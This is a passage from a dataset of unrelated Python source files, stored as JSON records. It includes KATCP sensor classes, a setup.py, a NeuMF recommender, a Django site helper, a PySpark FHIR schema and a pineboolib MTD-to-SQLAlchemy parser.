parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n\n Returns\n -------\n\n done : tornado Future that resolves when done or raises KATCPSensorError\n\n Notes\n -----\n\n It is recommended that implementations use :func:`normalize_strategy_parameters`\n to process the strategy_and_parms parameter, since it will deal with both string\n and list versions and makes sure that numbers are represented as strings in a\n consistent format.\n\n This method should arrange for the strategy to be set on the underlying network\n device or whatever other implementation is used. This strategy should also be\n automatically re-set if the device is reconnected, etc. If a strategy is set for a\n non-existing sensor, it should still cache the strategy and ensure that is applied\n whenever said sensor comes into existence. This allows an applications to pre-set\n strategies for sensors before synced / connected to a device.\n\n \"\"\"\n\n @abc.abstractmethod\n def drop_sampling_strategy(self, sensor_name):\n \"\"\"Drop the sampling strategy for the named sensor from the cache\n\n Calling :meth:`set_sampling_strategy` requires the sensor manager to\n memorise the requested strategy so that it can automatically be reapplied.\n If the client is no longer interested in the sensor, or knows the sensor\n may be removed from the server, then it can use this method to ensure the\n manager forgets about the strategy. This method will not change the current\n strategy. No error is raised if there is no strategy to drop.\n\n Parameters\n ----------\n\n sensor_name : str\n Name of the sensor (normal or escaped form)\n\n \"\"\"\n\n @abc.abstractmethod\n def poll_sensor(self, sensor_name):\n \"\"\"Poll sensor and arrange for sensor object to be updated\n\n Returns\n -------\n\n done_future : tornado Future\n Resolves when the poll is complete, or raises KATCPSensorError\n \"\"\"\n # TODO NM 2015-02-03 Might want to add a timeout parameter here, and to all the\n # other code that calls this\n\n @abc.abstractmethod\n def reapply_sampling_strategies(self):\n \"\"\"Reapply all sensor strategies using cached values\n\n Would typically be called when a connection is re-established. Should\n not raise errors when resetting strategies for sensors that no longer\n exist on the KATCP resource.\n \"\"\"\n\n\nclass KATCPSensor(with_metaclass(abc.ABCMeta, object)):\n \"\"\"Wrapper around a specific KATCP sensor on a given KATCP device.\n\n Each available KATCP sensor for a particular device has an associated\n :class:`KATCPSensor` object in the object hierarchy. This wrapper is mainly\n for interactive convenience. It provides the KATCP request help string as a\n docstring and registers listeners. Subclasses need to call the base class\n version of __init__().\n \"\"\"\n\n def __init__(self, sensor_description, sensor_manager):\n \"\"\"Subclasses must arrange to call this in their __init__().\n\n Parameters\n ----------\n sensor_description : dict\n Description of the KATCP sensor, with keys same as the parameters of\n :class:`katcp.Sensor`\n sensor_manager : :class:`KATCPSensorsManager` instance\n Manages sensor strategies, allows sensor polling, and provides time\n \"\"\"\n self._manager = sensor_manager\n self.clear_listeners()\n self._reading = KATCPSensorReading(0, 0, Sensor.UNKNOWN, None)\n # We'll be abusing a katcp.Sensor object slightly to make use of its\n # parsing and formatting functionality\n self._sensor = Sensor(**sensor_description)\n self._name = self._sensor.name\n # Overide the katpc.Sensor's set method with ours\n self._sensor.set = self.set\n # Steal the the katcp.Sensor's set_formatted method. Since we overrode\n # its set() method with ours, calling set_formatted will result in this\n # KATCPSensor object's value being set.\n self.set_formatted = self._sensor.set_formatted\n\n @property\n def parent_name(self):\n \"\"\"Name of the parent of this KATCPSensor\"\"\"\n return self._manager.resource_name\n\n @property\n def name(self):\n \"\"\"Name of this KATCPSensor\"\"\"\n return self._name\n\n @property\n def normalised_name(self):\n \"\"\"Normalised name of this KATCPSensor that can be used as a python identifier\"\"\"\n return escape_name(self._name)\n\n @property\n def reading(self):\n \"\"\"Most recently received sensor reading as KATCPSensorReading instance\"\"\"\n return self._reading\n\n @property\n def value(self):\n return self._reading.value\n\n @property\n def status(self):\n return self._reading.status\n\n @property\n def sampling_strategy(self):\n \"\"\"Current sampling strategy\"\"\"\n return self._manager.get_sampling_strategy(self.name)\n\n @property\n def description(self):\n return self._sensor.description\n\n @property\n def units(self):\n return self._sensor.units\n\n @property\n def type(self):\n return self._sensor.type\n\n def parse_value(self, s_value):\n \"\"\"Parse a value from a string.\n\n Parameters\n ----------\n s_value : str\n A string value to attempt to convert to a value for\n the sensor.\n\n Returns\n -------\n value : object\n A value of a type appropriate to the sensor.\n\n \"\"\"\n return self._sensor.parse_value(s_value)\n\n def set_strategy(self, strategy, params=None):\n \"\"\"Set current sampling strategy for sensor.\n Add this footprint for backwards compatibility.\n\n Parameters\n ----------\n\n strategy : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n params : seq of str or str\n (, [, ...])\n\n Returns\n -------\n done : tornado Future that resolves when done or raises KATCPSensorError\n\n \"\"\"\n if not params:\n param_args = []\n elif isinstance(params, basestring):\n param_args = [str(p) for p in params.split(' ')]\n else:\n if not isinstance(params, collections.Iterable):\n params = (params,)\n param_args = [str(p) for p in params]\n samp_strategy = \" \".join([strategy] + param_args)\n return self._manager.set_sampling_strategy(self.name, samp_strategy)\n\n def set_sampling_strategy(self, strategy):\n \"\"\"Set current sampling strategy for sensor\n\n Parameters\n ----------\n\n strategy : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n\n Returns\n -------\n done : tornado Future that resolves when done or raises KATCPSensorError\n\n \"\"\"\n return self._manager.set_sampling_strategy(self.name, strategy)\n\n def drop_sampling_strategy(self):\n \"\"\"Drop memorised sampling strategy for sensor, if any\n\n Calling this method ensures that the sensor manager does not attempt\n to reapply a sampling strategy. It will not raise an error if no strategy\n has been set. Use :meth:`set_sampling_strategy` to memorise a strategy again.\n \"\"\"\n self._manager.drop_sampling_strategy(self.name)\n\n def register_listener(self, listener, reading=False):\n \"\"\"Add a callback function that is called when sensor value is updated.\n\n The callback footprint is received_timestamp, timestamp, status, value.\n\n Parameters\n ----------\n listener : function\n Callback signature: if reading listener(katcp_sensor, reading) where\n `katcp_sensor` is this KATCPSensor instance `reading` is an instance of\n :class:`KATCPSensorReading`.\n\n Callback signature: default, if not reading listener(received_timestamp,\n timestamp, status, value)\n \"\"\"\n listener_id = hashable_identity(listener)\n self._listeners[listener_id] = (listener, reading)\n logger.debug(\n 'Register listener for {}'\n .format(self.name))\n\n def unregister_listener(self, listener):\n \"\"\"Remove a listener callback added with register_listener().\n\n Parameters\n ----------\n listener : function\n Reference to the callback function that should be removed\n\n \"\"\"\n listener_id = hashable_identity(listener)\n self._listeners.pop(listener_id, None)\n\n def is_listener(self, listener):\n listener_id = hashable_identity(listener)\n return listener_id in self._listeners\n\n def clear_listeners(self):\n \"\"\"Clear any registered listeners to updates from this sensor.\"\"\"\n self._listeners = {}\n\n def call_listeners(self, reading):\n logger.debug(\n 'Calling listeners {}'\n .format(self.name))\n for listener, use_reading in list(self._listeners.values()):\n try:\n if use_reading:\n listener(self, reading)\n else:\n listener(reading.received_timestamp, reading.timestamp,\n reading.status, reading.value)\n except Exception:\n logger.exception(\n 'Unhandled exception calling KATCPSensor callback {0!r}'\n .format(listener))\n\n def set(self, timestamp, status, value):\n \"\"\"Set sensor with a given received value, matches :meth:`katcp.Sensor.set`\"\"\"\n received_timestamp = self._manager.time()\n reading = KATCPSensorReading(received_timestamp, timestamp, status, value)\n self._reading = reading\n self.call_listeners(reading)\n\n def set_value(self, value, status=Sensor.NOMINAL, timestamp=None):\n \"\"\"Set sensor value with optinal specification of status and timestamp\"\"\"\n if timestamp is None:\n timestamp = self._manager.time()\n self.set(timestamp, status, value)\n\n def set_formatted(self, raw_timestamp, raw_status, raw_value, major):\n \"\"\"Set sensor using KATCP string formatted inputs\n\n Mirrors :meth:`katcp.Sensor.set_formatted`.\n\n This implementation is empty. Will, during instantiation, be overridden by the\n set_formatted() method of a katcp.Sensor object.\n \"\"\"\n\n @tornado.gen.coroutine\n def get_reading(self):\n \"\"\"Get a fresh sensor reading from the KATCP resource\n\n Returns\n -------\n reply : tornado Future resolving with :class:`KATCPSensorReading` object\n\n Notes\n -----\n\n As a side-effect this will update the reading stored in this object, and result in\n registered listeners being called.\n \"\"\"\n yield self._manager.poll_sensor(self._name)\n # By now the sensor manager should have set the reading\n raise Return(self._reading)\n\n @tornado.gen.coroutine\n def get_value(self):\n \"\"\"Get a fresh sensor value from the KATCP resource\n\n Returns\n -------\n reply : tornado Future resolving with :class:`KATCPSensorReading` object\n\n Notes\n -----\n\n As a side-effect this will update the reading stored in this object, and result in\n registered listeners being called.\n \"\"\"\n yield self._manager.poll_sensor(self._name)\n # By now the sensor manager should have set the reading\n raise Return(self._reading.value)\n\n @tornado.gen.coroutine\n def get_status(self):\n \"\"\"Get a fresh sensor status from the KATCP resource\n\n Returns\n -------\n reply : tornado Future resolving with :class:`KATCPSensorReading` object\n\n Notes\n -----\n\n As a side-effect this will update the reading stored in this object, and result in\n registered listeners being called.\n \"\"\"\n yield self._manager.poll_sensor(self._name)\n # By now the sensor manager should have set the reading\n raise Return(self._reading.status)\n\n def wait(self, condition_or_value, timeout=None):\n \"\"\"Wait for the sensor to satisfy a condition.\n\n Parameters\n ----------\n condition_or_value : obj or callable, or seq of objs or callables\n If obj, sensor.value is compared with obj. If callable,\n condition_or_value(reading) is called, and must return True if its\n condition is satisfied. Since the reading is passed in, the value,\n status, timestamp or received_timestamp attributes can all be used\n in the check.\n TODO: Sequences of conditions (use SensorTransitionWaiter thingum?)\n timeout : float or None\n The timeout in seconds (None means wait forever)\n\n Returns\n -------\n This command returns a tornado Future that resolves with True when the\n sensor value satisfies the condition. It will never resolve with False;\n if a timeout is given a TimeoutError happens instead.\n\n Raises\n ------\n :class:`KATCPSensorError`\n If the sensor does not have a strategy set\n :class:`tornado.gen.TimeoutError`\n If the sensor condition still fails after a stated timeout period\n\n \"\"\"\n if (isinstance(condition_or_value, collections.Sequence) and not\n isinstance(condition_or_value, basestring)):\n raise NotImplementedError(\n 'Currently only single conditions are supported')\n condition_test = (condition_or_value if callable(condition_or_value)\n else lambda s: s.value == condition_or_value)\n\n ioloop = tornado.ioloop.IOLoop.current()\n f = Future()\n if self.sampling_strategy == ('none', ):\n raise KATCPSensorError(\n 'Cannot wait on a sensor that does not have a strategy set')\n\n def handle_update(sensor, reading):\n # This handler is called whenever a sensor update is received\n try:\n assert sensor is self\n if condition_test(reading):\n self.unregister_listener(handle_update)\n # Try and be idempotent if called multiple times after the\n # condition is matched. This should not happen unless the\n # sensor object is being updated in a thread outside of the\n # ioloop.\n if not f.done():\n ioloop.add_callback(f.set_result, True)\n except Exception:\n f.set_exc_info(sys.exc_info())\n self.unregister_listener(handle_update)\n\n self.register_listener(handle_update, reading=True)\n # Handle case where sensor is already at the desired value\n ioloop.add_callback(handle_update, self, self._reading)\n\n if timeout:\n to = ioloop.time() + timeout\n timeout_f = with_timeout(to, f)\n # Make sure we stop listening if the wait times out to prevent a\n # buildup of listeners\n timeout_f.add_done_callback(\n lambda f: self.unregister_listener(handle_update))\n return timeout_f\n else:\n return f\n\n\n_KATCPReplyTuple = collections.namedtuple('_KATCPReplyTuple', 'reply informs')\n\n\nclass KATCPReply(_KATCPReplyTuple):\n \"\"\"Container for return messages of KATCP request (reply and informs).\n\n This is based on a named tuple with 'reply' and 'informs' fields so that\n the :class:`KATCPReply` object can still be unpacked into a normal tuple.\n\n Parameters\n ----------\n reply : :class:`katcp.Message` object\n Reply message returned by katcp request\n informs : list of :class:`katcp.Message` objects\n List of inform messages returned by KATCP request\n\n Attributes\n ----------\n messages: list of :class:`katcp.Message` objects\n List of all messages returned by KATCP request, reply first\n reply: :class:`katcp.Message` object\n Reply message returned by KATCP request\n informs: list of :class:`katcp.Message` objects\n List of inform messages returned by KATCP request\n\n The instance evaluates to nonzero (i.e. truthy) if the request succeeded.\n\n \"\"\"\n\n __slots__ = [] # Prevent dynamic attributes from being possible\n\n def __repr__(self):\n \"\"\"String representation for pretty-printing in IPython.\"\"\"\n return \"\\n\".join(\n \"%s%s %s\"\n % (\n ensure_native_str(Message.TYPE_SYMBOLS[m.mtype]),\n m.name,\n \" \".join([ensure_native_str(arg) for arg in m.arguments]),\n )\n for m in self.messages\n )\n\n def __str__(self):\n \"\"\"String representation using KATCP wire format\"\"\"\n return '\\n'.join(str(m) for m in self.messages)\n\n def __bool__(self):\n \"\"\"True if request succeeded (i.e. first reply argument is 'ok').\"\"\"\n return self.messages[0].reply_ok()\n\n if PY2:\n __nonzero__ = __bool__\n\n @property\n def messages(self):\n \"\"\"List of all messages returned by KATCP request, reply first.\"\"\"\n return [self.reply] + self.informs\n\n @property\n def succeeded(self):\n \"\"\"True if request succeeded (i.e. first reply argument is 'ok').\"\"\"\n return bool(self)\n"} {"ext": "py", "sha": "1a2ee45e0d3505c7a62e3d84edae917cc0417cd5", "content": "#!/usr/bin/env python\nfrom os import path\n\nimport setuptools\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\n\nfrom metaappscriptsdk import info\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst')) as f:\n long_description = f.read()\n\npackages = [\n 'metaappscriptsdk',\n 'metaappscriptsdk.logger',\n 'metaappscriptsdk.services',\n 'metaappscriptsdk.schedule',\n 'metaappscriptsdk.feed',\n]\n\ninstall_reqs = parse_requirements('requirements.txt')\nreqs = install_reqs\n\nsetuptools.setup(\n name=info.__package_name__,\n version=info.__version__,\n\n description='Meta App Scripts SDK',\n long_description=long_description,\n\n url='https://github.com/rw-meta/meta-app-script-py-sdk',\n\n author='Artur Geraschenko',\n author_email='arturgspb@gmail.com',\n\n license='MIT',\n\n classifiers=[\n 'Programming Language :: Python :: 3'\n ],\n install_requires=reqs,\n packages=packages,\n package_data={'': ['LICENSE']},\n package_dir={'metaappscriptsdk': 'metaappscriptsdk'},\n include_package_data=True,\n)\n"} {"ext": "py", "sha": "1a2ee540ef6781291803a80a80f59af0ef0156d2", "content": "\"\"\"\nModule description:\n\n\"\"\"\n\n__version__ = '0.1'\n__author__ = 'Vito Walter Anelli, Claudio Pomo'\n__email__ = 'vitowalter.anelli@poliba.it, claudio.pomo@poliba.it'\n\nimport numpy as np\nfrom ast import literal_eval as make_tuple\nfrom tqdm import tqdm\n\nfrom elliot.dataset.samplers import pointwise_pos_neg_sampler as pws\nfrom elliot.recommender.neural.NeuMF.neural_matrix_factorization_model import NeuralMatrixFactorizationModel\nfrom elliot.recommender.recommender_utils_mixin import RecMixin\nfrom elliot.utils.write import store_recommendation\n\nfrom elliot.recommender.base_recommender_model import BaseRecommenderModel\nfrom elliot.recommender.base_recommender_model import init_charger\n\nnp.random.seed(42)\n\n\nclass NeuMF(RecMixin, BaseRecommenderModel):\n r\"\"\"\n Neural Collaborative Filtering\n\n For further details, please refer to the `paper `_\n\n Args:\n mf_factors: Number of MF latent factors\n mlp_factors: Number of MLP latent factors\n mlp_hidden_size: List of units for each layer\n lr: Learning rate\n dropout: Dropout rate\n is_mf_train: Whether to train the MF embeddings\n is_mlp_train: Whether to train the MLP layers\n\n To include the recommendation model, add it to the config file adopting the following pattern:\n\n .. code:: yaml\n\n models:\n NeuMF:\n meta:\n save_recs: True\n epochs: 10\n mf_factors: 10\n mlp_factors: 10\n mlp_hidden_size: (64,32)\n lr: 0.001\n dropout: 0.0\n is_mf_train: True\n is_mlp_train: True\n \"\"\"\n @init_charger\n def __init__(self, data, config, params, *args, **kwargs):\n\n self._random = np.random\n\n self._sampler = pws.Sampler(self._data.i_train_dict)\n\n self._params_list = [\n (\"_learning_rate\", \"lr\", \"lr\", 0.001, None, None),\n (\"_mf_factors\", \"mf_factors\", \"mffactors\", 10, int, None),\n (\"_mlp_factors\", \"mlp_factors\", \"mlpfactors\", 10, int, None),\n (\"_mlp_hidden_size\", \"mlp_hidden_size\", \"mlpunits\", \"(64,32)\", lambda x: list(make_tuple(str(x))), lambda x: self._batch_remove(str(x), \" []\").replace(\",\", \"-\")),\n (\"_dropout\", \"dropout\", \"drop\", 0, None, None),\n (\"_is_mf_train\", \"is_mf_train\", \"mftrain\", True, None, None),\n (\"_is_mlp_train\", \"is_mlp_train\", \"mlptrain\", True, None, None),\n ]\n self.autoset_params()\n\n if self._batch_size < 1:\n self._batch_size = self._data.transactions\n\n self._ratings = self._data.train_dict\n self._sp_i_train = self._data.sp_i_train\n self._i_items_set = list(range(self._num_items))\n\n self._model = NeuralMatrixFactorizationModel(self._num_users, self._num_items, self._mf_factors,\n self._mlp_factors, self._mlp_hidden_size,\n self._dropout, self._is_mf_train, self._is_mlp_train,\n self._learning_rate)\n\n @property\n def name(self):\n return \"NeuMF\"\\\n + \"_e:\" + str(self._epochs) \\\n + \"_bs:\" + str(self._batch_size) \\\n + f\"_{self.get_params_shortcut()}\"\n\n def train(self):\n if self._restore:\n return self.restore_weights()\n\n best_metric_value = 0\n\n for it in range(self._epochs):\n loss = 0\n steps = 0\n with tqdm(total=int(self._data.transactions // self._batch_size), disable=not self._verbose) as t:\n for batch in self._sampler.step(self._data.transactions, self._batch_size):\n steps += 1\n loss += self._model.train_step(batch)\n t.set_postfix({'loss': f'{loss.numpy() / steps:.5f}'})\n t.update()\n\n if not (it + 1) % self._validation_rate:\n recs = self.get_recommendations(self.evaluator.get_needed_recommendations())\n result_dict = self.evaluator.eval(recs)\n self._results.append(result_dict)\n\n print(f'Epoch {(it + 1)}/{self._epochs} loss {loss/steps:.5f}')\n\n if self._results[-1][self._validation_k][\"val_results\"][self._validation_metric] > best_metric_value:\n print(\"******************************************\")\n best_metric_value = self._results[-1][self._validation_k][\"val_results\"][self._validation_metric]\n if self._save_weights:\n self._model.save_weights(self._saving_filepath)\n if self._save_recs:\n store_recommendation(recs, self._config.path_output_rec_result + f\"{self.name}-it:{it + 1}.tsv\")\n\n def get_recommendations(self, k: int = 100):\n predictions_top_k = {}\n for index, offset in enumerate(range(0, self._num_users, self._batch_size)):\n offset_stop = min(offset + self._batch_size, self._num_users)\n predictions = self._model.get_recs(\n (\n np.repeat(np.array(list(range(offset, offset_stop)))[:, None], repeats=self._num_items, axis=1),\n np.array([self._i_items_set for _ in range(offset, offset_stop)])\n )\n )\n v, i = self._model.get_top_k(predictions, self.get_train_mask(offset, offset_stop), k=k)\n items_ratings_pair = [list(zip(map(self._data.private_items.get, u_list[0]), u_list[1]))\n for u_list in list(zip(i.numpy(), v.numpy()))]\n predictions_top_k.update(dict(zip(map(self._data.private_users.get,\n range(offset, offset_stop)), items_ratings_pair)))\n return predictions_top_k\n"} {"ext": "py", "sha": "1a2ee5c384e1bc675aca57bff1eb30291c6e2ad1", "content": "from django.apps import apps\n\n\ndef get_current_site(request):\n \"\"\"\n Check if contrib.sites is installed and return either the current\n ``Site`` object or a ``RequestSite`` object based on the request.\n \"\"\"\n # Imports are inside the function because its point is to avoid importing\n # the Site models when django.contrib.sites isn't installed.\n if apps.is_installed('django.contrib.sites'):\n from .models import Site\n return Site.objects.get_current(request)\n else:\n from .requests import RequestSite\n return RequestSite(request)\n"} {"ext": "py", "sha": "1a2ee8806c7295fe5ca0987773269b476e6ccb94", "content": "class BuySellStock:\n # @param prices, a list of stock prices\n # @return index of buy and sell price\n def choiceStocks(self, prices):\n n = len(prices)\n if n == 0:\n return None, None\n if n == 1:\n return 0, 0\n maxPrice = prices[n - 1]\n mpIndex = n - 1\n maxProfit = 0\n for price in range(n):\n currPrice = prices[n - price - 1]\n if currPrice > maxPrice:\n maxPrice = currPrice\n mpIndex = n - price - 1\n currProfit = maxPrice - currPrice\n if currProfit > maxProfit:\n maxProfit = currProfit\n bpIndex = n - price - 1\n return bpIndex, mpIndex\n\n# Driver code to test the program\nrun = BuySellStock()\nprint(run.choiceStocks([5,6,7,8,10,3,8,7,11,1,2,11]))\n"} {"ext": "py", "sha": "1a2ee9b36c7eaf80f22187398afb4ca70cdb3239", "content": "from typing import Union, List, Optional\n\nfrom pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType\n\n\n# This file is auto-generated by generate_schema so do not edit it manually\n# noinspection PyPep8Naming\nclass SubstanceNucleicAcid_SugarSchema:\n \"\"\"\n Nucleic acids are defined by three distinct elements: the base, sugar and\n linkage. Individual substance/moiety IDs will be created for each of these\n elements. The nucleotide sequence will be always entered in the 5’-3’\n direction.\n \"\"\"\n\n # noinspection PyDefaultArgument\n @staticmethod\n def get_schema(\n max_nesting_depth: Optional[int] = 6,\n nesting_depth: int = 0,\n nesting_list: List[str] = [],\n max_recursion_limit: Optional[int] = 2,\n include_extension: Optional[bool] = False,\n extension_fields: Optional[List[str]] = None,\n extension_depth: int = 0,\n max_extension_depth: Optional[int] = 2,\n include_modifierExtension: Optional[bool] = False,\n use_date_for: Optional[List[str]] = None,\n parent_path: Optional[str] = \"\",\n ) -> Union[StructType, DataType]:\n \"\"\"\n Nucleic acids are defined by three distinct elements: the base, sugar and\n linkage. Individual substance/moiety IDs will be created for each of these\n elements. The nucleotide sequence will be always entered in the 5’-3’\n direction.\n\n\n id: Unique id for the element within a resource (for internal references). This\n may be any string value that does not contain spaces.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the element. To make the use of extensions safe and manageable,\n there is a strict set of governance applied to the definition and use of\n extensions. Though any implementer can define an extension, there is a set of\n requirements that SHALL be met as part of the definition of the extension.\n\n modifierExtension: May be used to represent additional information that is not part of the basic\n definition of the element and that modifies the understanding of the element\n in which it is contained and/or the understanding of the containing element's\n descendants. Usually modifier elements provide negation or qualification. To\n make the use of extensions safe and manageable, there is a strict set of\n governance applied to the definition and use of extensions. Though any\n implementer can define an extension, there is a set of requirements that SHALL\n be met as part of the definition of the extension. Applications processing a\n resource are required to check for modifier extensions.\n\n Modifier extensions SHALL NOT change the meaning of any elements on Resource\n or DomainResource (including cannot change the meaning of modifierExtension\n itself).\n\n identifier: The Substance ID of the sugar or sugar-like component that make up the\n nucleotide.\n\n name: The name of the sugar or sugar-like component that make up the nucleotide.\n\n residueSite: The residues that contain a given sugar will be captured. The order of given\n residues will be captured in the 5‘-3‘direction consistent with the base\n sequences listed above.\n\n \"\"\"\n if extension_fields is None:\n extension_fields = [\n \"valueBoolean\",\n \"valueCode\",\n \"valueDate\",\n \"valueDateTime\",\n \"valueDecimal\",\n \"valueId\",\n \"valueInteger\",\n \"valuePositiveInt\",\n \"valueString\",\n \"valueTime\",\n \"valueUnsignedInt\",\n \"valueUri\",\n \"valueUrl\",\n \"valueReference\",\n \"valueCodeableConcept\",\n \"valueAddress\",\n ]\n from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema\n from spark_fhir_schemas.r4.complex_types.identifier import IdentifierSchema\n\n if (\n max_recursion_limit\n and nesting_list.count(\"SubstanceNucleicAcid_Sugar\") >= max_recursion_limit\n ) or (max_nesting_depth and nesting_depth >= max_nesting_depth):\n return StructType([StructField(\"id\", StringType(), True)])\n # add my name to recursion list for later\n my_nesting_list: List[str] = nesting_list + [\"SubstanceNucleicAcid_Sugar\"]\n my_parent_path = (\n parent_path + \".substancenucleicacid_sugar\"\n if parent_path\n else \"substancenucleicacid_sugar\"\n )\n schema = StructType(\n [\n # Unique id for the element within a resource (for internal references). This\n # may be any string value that does not contain spaces.\n StructField(\"id\", StringType(), True),\n # May be used to represent additional information that is not part of the basic\n # definition of the element. To make the use of extensions safe and manageable,\n # there is a strict set of governance applied to the definition and use of\n # extensions. Though any implementer can define an extension, there is a set of\n # requirements that SHALL be met as part of the definition of the extension.\n StructField(\n \"extension\",\n ArrayType(\n ExtensionSchema.get_schema(\n max_nesting_depth=max_nesting_depth,\n nesting_depth=nesting_depth + 1,\n nesting_list=my_nesting_list,\n max_recursion_limit=max_recursion_limit,\n include_extension=include_extension,\n extension_fields=extension_fields,\n extension_depth=extension_depth,\n max_extension_depth=max_extension_depth,\n include_modifierExtension=include_modifierExtension,\n use_date_for=use_date_for,\n parent_path=my_parent_path,\n )\n ),\n True,\n ),\n # May be used to represent additional information that is not part of the basic\n # definition of the element and that modifies the understanding of the element\n # in which it is contained and/or the understanding of the containing element's\n # descendants. Usually modifier elements provide negation or qualification. To\n # make the use of extensions safe and manageable, there is a strict set of\n # governance applied to the definition and use of extensions. Though any\n # implementer can define an extension, there is a set of requirements that SHALL\n # be met as part of the definition of the extension. Applications processing a\n # resource are required to check for modifier extensions.\n #\n # Modifier extensions SHALL NOT change the meaning of any elements on Resource\n # or DomainResource (including cannot change the meaning of modifierExtension\n # itself).\n StructField(\n \"modifierExtension\",\n ArrayType(\n ExtensionSchema.get_schema(\n max_nesting_depth=max_nesting_depth,\n nesting_depth=nesting_depth + 1,\n nesting_list=my_nesting_list,\n max_recursion_limit=max_recursion_limit,\n include_extension=include_extension,\n extension_fields=extension_fields,\n extension_depth=extension_depth,\n max_extension_depth=max_extension_depth,\n include_modifierExtension=include_modifierExtension,\n use_date_for=use_date_for,\n parent_path=my_parent_path,\n )\n ),\n True,\n ),\n # The Substance ID of the sugar or sugar-like component that make up the\n # nucleotide.\n StructField(\n \"identifier\",\n IdentifierSchema.get_schema(\n max_nesting_depth=max_nesting_depth,\n nesting_depth=nesting_depth + 1,\n nesting_list=my_nesting_list,\n max_recursion_limit=max_recursion_limit,\n include_extension=include_extension,\n extension_fields=extension_fields,\n extension_depth=extension_depth + 1,\n max_extension_depth=max_extension_depth,\n include_modifierExtension=include_modifierExtension,\n use_date_for=use_date_for,\n parent_path=my_parent_path,\n ),\n True,\n ),\n # The name of the sugar or sugar-like component that make up the nucleotide.\n StructField(\"name\", StringType(), True),\n # The residues that contain a given sugar will be captured. The order of given\n # residues will be captured in the 5‘-3‘direction consistent with the base\n # sequences listed above.\n StructField(\"residueSite\", StringType(), True),\n ]\n )\n if not include_extension:\n schema.fields = [\n c\n if c.name != \"extension\"\n else StructField(\"extension\", StringType(), True)\n for c in schema.fields\n ]\n\n if not include_modifierExtension:\n schema.fields = [\n c\n if c.name != \"modifierExtension\"\n else StructField(\"modifierExtension\", StringType(), True)\n for c in schema.fields\n ]\n\n return schema\n"} {"ext": "py", "sha": "1a2eea72af7ac86b9529a084586cc260eef68da8", "content": "m = h = mu = 0\nwhile True:\n print(25*'-')\n print(' CADASTRE UMA PESSOA')\n print(25*'-')\n i = int(input('Idade: '))\n if i > 17:\n m+=1\n while True:\n s = input('Sexo: [M/F] ').strip().upper()[0]\n if s in 'MF':\n break\n print(25*'-')\n if s == 'M':\n h+=1\n if s == 'F' and i < 21:\n mu+=1\n while True:\n q = input('Quer continuar? [S/N] ').strip().upper()[0]\n if q in 'SN':\n break\n if q == 'N':\n break\nprint(f'====== FIM DO PROGRAMA ======\\nTotal de pessoas com mais de 18 anos: {m}\\nAo todo temos {h} homens cadastrados.\\nE temos {mu} mulheres com menos de 20 anos.')"} {"ext": "py", "sha": "1a2eeb918f387d630e9884de81cfb4ee96e47303", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nMTD Parser to sqlAlchemy model.\n\nCreates a Python file side by side with the original MTD file.\nCan be overloaded with a custom class to enhance/change available\nfunctions. See pineboolib/pnobjectsfactory.py\n\"\"\"\n\nfrom pineboolib import application, logging\nfrom pineboolib.application import file\nimport os\n\nfrom typing import List, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from pineboolib.application.metadata import pnfieldmetadata, pntablemetadata # pragma: no cover\n\n\nLOGGER = logging.get_logger(__name__)\n\nRESERVER_WORDS = [\"pass\"]\n\n\ndef mtd_parse(\n meta_or_name: Union[str, \"pntablemetadata.PNTableMetaData\"], path_mtd: str = \"\"\n) -> str:\n \"\"\"\n Parse MTD into SqlAlchemy model.\n \"\"\"\n\n if application.PROJECT.conn_manager is None:\n raise Exception(\"Project is not connected yet\")\n\n dest_file = \"%s_model.py\" % (\n path_mtd\n if isinstance(meta_or_name, str)\n else \"%s/cache/%s\" % (application.PROJECT.tmpdir, meta_or_name.name())\n )\n\n if os.path.exists(dest_file):\n return dest_file\n\n if isinstance(meta_or_name, str):\n metadata = application.PROJECT.conn_manager.manager().metadata(meta_or_name, True)\n else:\n metadata = meta_or_name\n\n if metadata is None:\n return \"\"\n\n lines = _generate_model(metadata)\n if not lines:\n dest_file = \"\"\n else:\n _write_file(dest_file, lines)\n\n return dest_file\n\n\ndef _write_file(file_name: str, lines: List[str]) -> None:\n \"\"\"Write lines to a file.\"\"\"\n\n file_ = open(file_name, \"w\", encoding=\"UTF-8\")\n file_.writelines([line if line.endswith(\"\\n\") else \"%s\\n\" % line for line in lines])\n file_.close()\n\n\ndef _get_meta(file_mtd: \"file.File\") -> List[str]:\n \"\"\"Return list with meta.\"\"\"\n\n mtd_data_list: List[str] = []\n if os.path.exists(file_mtd.path()):\n mtd_data = application.PROJECT.conn_manager.manager().metadata(file_mtd.filename, True)\n if mtd_data is not None:\n mtd_data_list = _generate_model(mtd_data, False)\n\n return mtd_data_list\n\n\ndef _generate_model(mtd_table: \"pntablemetadata.PNTableMetaData\", header: bool = True) -> List[str]:\n \"\"\"\n Create a list of lines from a mtd_table (pntablemetadata.PNTableMetaData).\n \"\"\"\n\n return _create_declaration(mtd_table, header)\n\n\ndef generate_field(field: \"pnfieldmetadata.PNFieldMetaData\") -> str:\n \"\"\"\n Get text representation for sqlAlchemy of a field type given its pnfieldmetadata.PNFieldMetaData.\n \"\"\"\n data: List[str] = []\n # TYPE\n\n # = \"String\"\n ret = \"\"\n type_ = field.type()\n if type_ in (\"int, serial\"):\n ret = \"sqlalchemy.Integer\"\n elif type_ in (\"uint\"):\n ret = \"sqlalchemy.BigInteger\"\n elif type_ in (\"calculated\"):\n ret = \"sqlalchemy.String\"\n # elif field.type() in (\"double\"):\n # ret = \"sqlalchemy.Numeric\"\n # ret += \"(%s , %s)\" % (field.partInteger(), field.partDecimal())\n elif type_ == \"double\":\n ret = \"sqlalchemy.Float\"\n\n elif type_ in (\"string\", \"stringlist\", \"pixmap\"):\n ret = \"sqlalchemy.String\"\n if field.length():\n ret += \"(%s)\" % field.length()\n\n elif type_ in (\"bool\", 